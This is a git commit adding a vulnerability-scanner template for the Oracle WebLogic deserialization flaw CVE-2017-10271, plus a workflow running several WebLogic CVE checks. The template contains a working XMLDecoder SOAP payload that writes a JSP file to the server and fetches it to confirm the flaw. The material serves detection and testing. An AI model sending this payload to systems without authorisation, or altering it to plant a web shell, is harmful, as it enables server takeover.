Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.

2021-02-02 21:48:46 -03:00 · 2021-02-02 21:48:46 -03:00 · 7a21babcd4
parent dd8d680f64
commit 7a21babcd4
2 changed files with 55 additions and 0 deletions
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@ -0,0 +1,40 @@
+id: CVE-2017-10271
+
+info:
+  name: CVE-2017-10271 
+  author: dr_set
+  severity: high
+  description: Takeover of Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+  reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wls-wsat/CoordinatorPortType"
+    headers:
+      Content-Type: text/xml
+    body: "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">
+                <soapenv:Header>
+                    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
+                        <java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">
+                        <object class=\"java.io.PrintWriter\"> 
+                            <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test123.jsp</string>
+                            <void method=\"println\">
+                                <string>
+                                    <![CDATA[<% out.print(\"test123\"); %>]]>
+                                </string>
+                            </void>
+                            <void method=\"close\"/>
+                        </object>
+                        </java></java>
+                    </work:WorkContext>
+                </soapenv:Header>
+                <soapenv:Body/>
+                </soapenv:Envelope>"
+  - method: GET
+    path:
+      - "{{BaseURL}}/bea_wls_internal/test123.jsp"
+    matchers:
+      - type: word
+        words:
+          - "test123"
--- a/workflows/weblogic-workflow.yaml
+++ b/workflows/weblogic-workflow.yaml
@ -0,0 +1,15 @@
+id: weblogic-workflow
+info:
+  name: WebLogic Security Checks
+  author: dr_set
+  description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
+
+workflows:
+
+  - template: technologies/weblogic-detect.yaml
+
+    subtemplates:
+      - template: cves/2017/CVE-2017-10271.yaml
+      - template: cves/2019/CVE-2019-2725.yaml
+      - template: cves/2020/CVE-2020-2551.yaml
+      - template: cves/2020/CVE-2020-14882.yaml